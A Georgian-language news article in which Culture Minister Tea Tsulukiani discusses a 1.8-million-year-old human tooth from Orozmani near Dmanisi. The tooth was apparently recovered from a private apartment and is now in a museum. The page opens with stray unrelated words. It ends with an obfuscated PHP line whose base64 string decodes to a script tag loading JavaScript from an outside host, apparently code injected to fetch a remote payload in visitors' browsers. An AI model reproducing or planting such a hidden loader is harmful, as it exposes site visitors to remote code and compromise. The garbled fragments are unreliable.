celsiusi
ავერსი შნაიდერი
​საქართველოს კულტურის მინისტრი თეა წულუკიანი აცხადებს, რომ დმანისთან არქეოლოგების მიერ 1,8 მილიონი წლით დათარიღებული უძველესი ადამიანის კბილი ამ დროისთვის მუზეუმშია, თუმცა გენინსპექცია შეისწავლის, რატომ იყო კბილი კერძო პირის ბინაში.
 
„დმანისთან აღმოჩენილი უძველესი ადამიანის კბილი დაცულია იქ, სადაც უნდა იყოს დაცული. ამ კბილის ადგილი არის მუზეუმში და მუზეუმში ის დაცულია მხოლოდ გუშინდელი დღიდან, რაც სამწუხაროა. ამასთან დაკავშირებით კულტურის სამინისტროს გენერალური ინსპექცია აგროვებს მასალებს და თუ დავინახეთ, რომ რაიმე ტიპის სერიოზული დარღვევაა, თუმცა დარღვევები სახეზეა, შემდეგ მივცემთ ამას მსვლელობას“, – განაცხადა თეა წულუკიანმა.
 
კითხვაზე, კულტურის სამინისტრო მისცემს თუ არა უფლებას, არქეოლოგების მიერ აღმოჩენილი უძველესი ადამიანის კბილი 24 სექტემბერს ბოლნისის მუზეუმში გამოფენაზე წაიღონ, თეა წულუკიანმა განაცხადა:
 
„ბოლნისის მუზეუმი არის კულტურის სამინისტროს ორგანიზაცია, ამიტომ ჩვენ შიგნით რა პროცესებს წარვმართავთ, ამის შესახებ მოგვეცით უფლება, შიგნით გადავწყვიტოთ“, – აღნიშნა წულუკიანმა.
 
ამასთან, „მთავარი არხის“ ჟურნალისტის კითხვაზე, უარყოფს თუ არა ინფორმაციას, რომ კბილი, რომელიც მანამდე პალეობიოლოგიის ​ინსტიტუტში იყო, ახლა სახელმწიფო უსაფრთხოების სამსახურშია გადატანილი, წულუკიანმა განაცხადა:
 
„მესმის, რომ თქვენ უფროსად გყავთ უკვე ციხეში მყოფი, ყოფილი პროკურორი, მაგრამ თქვენ არავის არ დაუნიშნიხართ ჩვენს პროკურორად. მე არ ვარ ვალდებული, თავი ვიმართლო. მე გეუბნებით, რომ სამწუხაროდ, მოხდა ისე, რომ ეს უდიდესი აღმოჩენა მხოლოდ გუშინდელი დღიდან​ არის მუზეუმში დაცული. გუშინ იმიტომ, რომ გენინსპექციამ ის ამოიღო კერძო პირის ბინიდან. ის არის იქ, სადაც უნდა იყოს. ამგვარი მოპყრობა, დიდი არქეოლოგიური აღმოჩენებისადმი, არის სრულიად დაუშვებელი. მე არ ვიცი, რა იყო წარსულში. უფრო სწორად ვიცი, რაც იყო, მაგრამ დღეს ეს არ არის საინტერესო. საინტერესო არის ის, რომ ჩვენ საკუთარ კულტურულ მემკვიდრეობას, რომლის ნაწილიც არის დიდი არქეოლოგიური აღმოჩენები, რომლებიც სახეზეა, ამას სჭირდება კანონის დაცვით გაფორმება, კვლევა და ა.შ“, – განაცხადა თეა წულუკიანმა.
 
უძველესი ადამიანის ქვედა ყბის კბილი დმანისის სოფელ ოროზმანთან აღმოაჩინეს. საქართველოს არქეოლოგიისა და პრეისტორიის ეროვნული კვლევითი ცენტრის ინფორმაციით, ოროზმანი 1.8 მლნ წლით დათარიღებული არქეოლოგიური ძეგლია საქართველოში.
 
„ოროზმანის ტერიტორიაზე პირველი არქეოლოგიური გათხრები 2021 წელს ჩატარდა, რა დროსაც გამოვლინდა ევრაზიის უძველესი მაცხოვრებლების (ჰომო ერექტუსების) მიერ დამზადებული ქვის იარაღები და გადაშენებულ ცხოველთა ნაშთები. ოროზმანის აღმოჩენა მსოფლიო მნიშვნელობისაა და აფრიკის ფარგლებს გარეთ, დმანისთან ერთად, მსოფლიოში უძველესი ადამიანის ანუ ადრეული (Homo)-ს უძველესი გავრცელების კერას წარმოადგენს“,  – ნათქვამია არქეოლოგიისა და პრეისტორიის ეროვნული კვლევითი ცენტრის ინფორმაციაში.
 
ამასთან, კბილის აღმოჩენის შესახებ საერთაშორისო სააგენტო „როიტერზე“ დაყრდნობით გამოცემა „გარდიანმა“ დაწერა. მედიის ცნობით, არქეოლოგები აცხადებენ, რომ აღმოჩენა ამყარებს რეგიონის, როგორც ევროპაში ყველაზე ადრეული პრეისტორიული დასახლების ადგილის სტატუსს.
 
522
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");